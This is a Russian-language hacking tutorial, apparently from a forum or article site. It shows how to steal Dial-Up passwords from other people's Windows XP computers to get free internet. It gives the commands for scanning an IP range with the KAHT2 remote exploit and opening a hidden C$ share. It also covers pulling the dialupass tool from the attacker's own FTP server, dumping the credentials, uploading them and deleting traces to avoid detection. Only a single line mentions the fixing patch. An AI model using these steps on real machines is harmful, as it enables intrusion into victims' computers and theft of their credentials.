пароли к Dial-Up в XP
Статей про то, как надыбать пароли к Dial-Up в 98, Ме больше чем надо, это уже знает каждый младенец. Тем более что они там сильно упрощают ситуацию, типа у каждого второго юзверя расшарин в корне диск С. В реальной жизни это попадается довольно таки редко. А вот статей как достать пароли в ХР почти нету, а может и нету вообще, (по крайней мере я не нашел). И по этому я решил рассказать всем любителям халявного инета как достать пароли на Dial-Up в ХР.
Так вот начнем.
В ХР нету файла типа *.pwl, есть правда файл SAM, но в нем не хранится паролей на Dial-Up, а только пароли к учетным записям, которые используются при в ходе в винду. Инфа про пароли на Dial-Up хранится в реестре, и есть очень классная прога, под названием dialupass 2.4 ,(ниже версию использовать не рекомендую), которая вытаскивает их от туда. Для того чтобы узнать свой логин и пароль достаточно ее запустить на своем компе, и она тебе сразу же покажет их. Тут напрашивается мысля, что надо это прогу каким-то макаром запустить на удаленном компе.
Сделать это нам поможет гигантская ошибка в ХР и 2000 винде. Эксплоит реализующий эту ошибку называется КАНТ2, воспользовавшись этим эксплоитом мы получаем в свое распоряжение командную строчку удаленного компа. То есть, ты получаешь полный доступ к его компу. Можешь удалять, создавать, копировать файлы по своему усмотрению. (но мы же не вандалы, и нечего удалять не будем). Эксплоит нужно запускать с командной строки, заходим в папку где лежит наша прога, и пишем:
kaht2 «диапазон IP» который мы хотим проверить на наличие этой уязвимости, например 192.168.1.1 192.168.1.255. Эксплоит находит уязвимые компы и перед нами появляется строчка C:windowssystem32 . Вот мы и на чужом компе, можете походить, посмотреть, может найдете что интересного. Если у чувака на удаленном компе в настройках сети стоит галочка Доступ к файлам и принтерам, можем написать команду net share C$$=C: этой командой мы расшариваем в корне диск С, а знак доллара делает эту шару не видимой в сетевом окружении. Потом просто в адресной строке IE пишем IP чувакаС$$ и вот мы видим его диск С, можете конечно оставить следы вашего присутствия, типа файл с своей фоткой и адресом проживания и надписью, “I HACK YOU!!!”, но все таки лучше оставатся не замеченным. Копируем ему на винт нашу дорогую прогу dialupass 2.4, а в командной строке заходим в ту папку куда вы скопировали прогу и пишете дорогую команду dialupass /all /stext xz.txt. И…. перед нами появляется файл с названием xz.txt, мы быстренько копируем его себе на комп, а с удаленного компа этой txt файл и саму прогу быстро удаляем, чтобы нас не заметили. Открываем этот файл и видим… как вы думаете что? Конечно! Пароль к Dial-Up соединению! Можете поздравить себя с успешным хаком! Чтобы продолжить дальше искать ламеров, в командной строке щелкаете Ctrl+Z и Эксплоит пойдет дальше искать уязвимые компы.
Но иногда бывает не все так легко, у некоторых не разрешен доступ к шарам вообще, и мы не сможем попасть на диск С просто с винды, чтобы скопировать туда нашу прогу, а с ДОСа это сделать сложнее. Но можно! В компе слово «нельзя» нету! Настраиваем на своем компе ftp, статей на эту тему вы найдете много, как это можно сделать. Могу посоветовать маленькую классную прогу, только срок ее использования ограничен, нужно денюшку платить, называется она Small HTTP Server ver. 3.04.10. Создаете себе учетную запись с логином и паролем и разрешаете запись себе на любую папку. Кидаете туда нашу дорогую прогу, когда вы получили командную строку удаленного компа в свое распоряжение пишете три буквы: ftp. Вы переходите в режим ftp, потом пишете простую команду open «свой IP» заходите в ту папку куда вы скинули нашу прожку, пишете команду get dialupass.exe и наша прога копируется туда где вы находились до того как перешли в режим ftp, если вы не куда не переходили то это будет папка C:windowssystem32, если все правильно сделали вам сказали что все успешно скопировано, пишете команду quit, вот вы опять в нашей папке C:windowssystem32. Затем опять пишете командочку dialupass /all /stext xz.txt, создается файл и мы можем его сразу просмотреть командой type xz.txt и пароль переписать на листочек или повторить обратные действия, скопировать его на ftp командой put xz.txt, и не забудьте удалить файл проги и этот txt файл с чужого компа, если вас посекут и вдуплятся что вы украли пароли, то в лудшем случаи пароль сменят, а в худшем… думайте сами.
Так! А теперь как защитится от этого вида взлома. Просто напросто установить себе патч, WindowsXP-KB823980, вроде так называется, и все. Уязвимость эта закрыта, и больше не кто не сможет попасть к вам на винт таким способом.
Ну вот и все впринципе. Пароли у нас в кармане, наслождайтесь халявным инетом. Будут вопросы пишите, с удовольствием отвечу pdalex@fast.net.ua
Автор: PdAlex
Разместил: Helfer